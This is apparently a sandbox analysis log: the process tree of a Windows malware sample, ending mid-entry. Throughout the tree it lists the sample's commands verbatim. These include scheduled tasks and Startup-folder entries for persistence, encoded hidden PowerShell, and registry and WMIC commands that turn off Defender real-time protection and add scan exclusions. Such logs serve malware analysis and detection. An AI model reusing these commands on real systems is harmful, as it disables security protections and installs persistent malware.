"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.3.1792341188\156086993" -childID 2 -isForBrowser -prefsHandle 2308 -prefMapHandle 2384 -prefsLen 26685 -prefMapSize 233556 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10ca5c62-69e7-44cc-b593-4dc4d13eba61} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 2420 1da7be58 tab
7⤵
PID:3264

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.4.1146985457\341835170" -childID 3 -isForBrowser -prefsHandle 3340 -prefMapHandle 3336 -prefsLen 26685 -prefMapSize 233556 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc8f6041-8b57-49bf-8b57-610686425beb} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 3352 20540758 tab
7⤵
PID:2416

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.5.1178449536\1554569085" -childID 4 -isForBrowser -prefsHandle 3548 -prefMapHandle 3552 -prefsLen 26685 -prefMapSize 233556 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {58a4995e-1750-4011-8238-0b8f2511f8cd} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 3532 20889258 tab
7⤵
PID:2652

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.6.1086388417\284005764" -childID 5 -isForBrowser -prefsHandle 3796 -prefMapHandle 3800 -prefsLen 26685 -prefMapSize 233556 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1bf4f80-3bdc-4ddc-8343-068541883f85} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 3780 2088c558 tab
7⤵
PID:1056

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
5⤵
PID:1360

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
6⤵
PID:3544

C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe
"C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"
4⤵
- Executes dropped EXE
PID:3696

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
2⤵
PID:1168

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2232

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
2⤵
- Drops startup file
PID:2196

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
2⤵
PID:1540

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2664

C:\Windows\system32\taskeng.exe
taskeng.exe {10A842EA-15C9-41EF-8A2E-AD467A2A1A00} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
1⤵
PID:3468

C:\ProgramData\explorer.exe
C:\ProgramData\explorer.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3520

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2600

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:3544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:2128

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2516

C:\ProgramData\explorer.exe
C:\ProgramData\explorer.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3384

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3372

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
PID:3832

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
- Checks processor information in registry
- Modifies registry class
PID:3764

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.0.1433838594\408033595" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 21557 -prefMapSize 233780 -appDir "C:\Program Files\Mozilla Firefox\browser" - {14bccc42-113c-4970-a0f1-498581935077} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 1276 13e83558 gpu
4⤵
PID:3572

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.1.742129587\217715378" -parentBuildID 20221007134813 -prefsHandle 1452 -prefMapHandle 1448 -prefsLen 21638 -prefMapSize 233780 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b6b7fce-91f1-4c48-82dd-28afca131663} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 1464 101f1f58 socket
4⤵
PID:1928

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.2.1620522240\1094266911" -childID 1 -isForBrowser -prefsHandle 1732 -prefMapHandle 1972 -prefsLen 21676 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {31189acb-4bcd-42ed-9d8c-4b8d1b9997fd} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 1948 1a11f858 tab
4⤵
PID:1492

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.3.1367466615\1770339965" -childID 2 -isForBrowser -prefsHandle 2412 -prefMapHandle 2356 -prefsLen 26870 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f5ec7ab-bc8b-4951-8c29-4568fbdc67cf} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 2436 1c2f9358 tab
4⤵
PID:1592

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.4.1894984179\2130678914" -childID 3 -isForBrowser -prefsHandle 1756 -prefMapHandle 3168 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b8ac64e-532f-426d-8c86-4135cec1148d} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 1088 203adc58 tab
4⤵
PID:4020

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.5.1476871220\1943131024" -childID 4 -isForBrowser -prefsHandle 3212 -prefMapHandle 3156 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ec9c00f-2804-4c20-b3b2-03c78e2ea6ef} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 3240 1911d158 tab
4⤵
PID:3996

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.6.902322306\2089379629" -childID 5 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {904eb98b-1f54-40e9-afba-79b1ffff8f01} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 3920 235a4158 tab
4⤵
PID:1680

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.7.718286514\531049192" -childID 6 -isForBrowser -prefsHandle 4036 -prefMapHandle 4040 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c9b5697-e648-45f7-9277-838283f1738a} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 4024 235a4a58 tab
4⤵
PID:3596

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.8.1317850315\1159021742" -childID 7 -isForBrowser -prefsHandle 4212 -prefMapHandle 4220 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {312fccc2-e03d-425a-a2b5-fc58ff8fd69f} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 4200 235a6258 tab
4⤵
PID:2064

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.9.1865846297\557052169" -childID 8 -isForBrowser -prefsHandle 3792 -prefMapHandle 3804 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {961b951e-7bd4-4373-8510-ad28ff1d5bd1} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 3640 1911d158 tab
4⤵
PID:3364

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.10.2033647301\1426711647" -childID 9 -isForBrowser -prefsHandle 4008 -prefMapHandle 3944 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62cccd01-c9fc-4b54-a8e1-c70d84c2b17b} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 4004 2073ce58 tab
4⤵
PID:2460

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.11.1435884242\1649117651" -childID 10 -isForBrowser -prefsHandle 4188 -prefMapHandle 3940 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {69ac2e9b-c90b-4fb2-a82c-25fb7bb36a53} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 4468 2073e658 tab
4⤵
PID:3416

C:\ProgramData\explorer.exe
C:\ProgramData\explorer.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2572

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
2⤵
- Executes dropped EXE
PID:3320

C:\ProgramData\explorer.exe
C:\ProgramData\explorer.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2520

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
2⤵
- Executes dropped EXE
PID:2424

C:\ProgramData\explorer.exe
C:\ProgramData\explorer.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3708

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
2⤵
- Executes dropped EXE
PID:3748

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js"
2⤵
PID:1980

C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr
"C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr" "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\W"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:2252

C:\Windows\system32\taskeng.exe
taskeng.exe {DD2A70BA-C0BF-4B58-866F-364380E076A4} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2484

C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\fIQqLZn.exe
C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\fIQqLZn.exe PV /XkfcdidfUWc 385121 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:348

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
- System Location Discovery: System Language Discovery
PID:1396

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2100

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2152

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:1768

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
- Indirect Command Execution
PID:1032

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:768

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
PID:2392

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
- Indirect Command Execution
PID:3024

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2928

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
PID:3240

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
- Indirect Command Execution
PID:3324

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:3332

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:2128

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
- Indirect Command Execution
PID:2844

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- System Location Discovery: System Language Discovery
PID:1064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3596

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
7⤵
PID:3908

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gAQuuQjav" /SC once /ST 00:57:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Scheduled Task/Job: Scheduled Task
PID:3200

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gAQuuQjav"
3⤵
PID:1528

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gAQuuQjav"
3⤵
PID:1492

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:916

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3824

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:3380

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3360

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gFvOMFvNc" /SC once /ST 01:55:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2588

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gFvOMFvNc"
3⤵
PID:1852

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gFvOMFvNc"
3⤵
PID:3892

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
- Indirect Command Execution
PID:1668

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:3204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3316

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3120

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:3152

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:2624

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:3188

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:1372

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1388

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1700

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1228

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\HIoTiJfsoGzpkHVf\nhhxtYyg\czsjwLcKkpZfrfLa.wsf"
3⤵
- System Location Discovery: System Language Discovery
PID:2904

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\HIoTiJfsoGzpkHVf\nhhxtYyg\czsjwLcKkpZfrfLa.wsf"
3⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:3444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:3064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2324

C:\Windows\SysWOW64\reg.exe
